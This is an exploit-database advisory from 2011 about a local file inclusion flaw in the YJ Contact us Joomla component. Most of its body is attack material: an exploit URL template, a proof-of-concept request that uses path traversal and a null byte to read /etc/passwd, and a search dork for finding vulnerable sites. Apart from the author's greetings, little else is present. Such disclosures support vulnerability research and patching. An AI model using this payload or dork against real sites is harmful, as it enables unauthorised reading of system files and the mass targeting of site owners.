Joomla YJ Contact us Component Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla YJ Contact us Component Local File Inclusion Vulnerability
# Published : 2011-10-25
# Author :
# Previous Title : GotoCode Online Classifieds Multiple Vulnerabilities
# Next Title : Sports PHool <= 1.0 Remote File Include Exploit

================================================================================
  
  - YJ Contact us - Enhanced Joomla Contact Form <= Local File Inclusion Vulnerability
   
       Software : YJ Contact us - Enhanced Joomla Contact Form 
       Vendor   : http://www.youjoomla.com/yj-contact-us-enhanced-joomla-contact-form-2.html
       Author   : Mego
       Contact  : nowar204[at]hotmail[dot]com
       Home     : NONE
 
================================================================================
 
  - Exploit
 
       http://localhost/[path]/index.php?option=com_yjcontactus&view=[LFI]
 
 
  - PoC
 
       http://localhost/[path]/index.php?option=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../../etc/passwd%00
 
 
  - Dork
 
       "com_yjcontactus"+view
 
================================================================================
 
  - Greetz
 
       norgod,g0ld,vnc and all brazilian c0ders
 
================================================================================
 
  - October 25 2011 - Morocco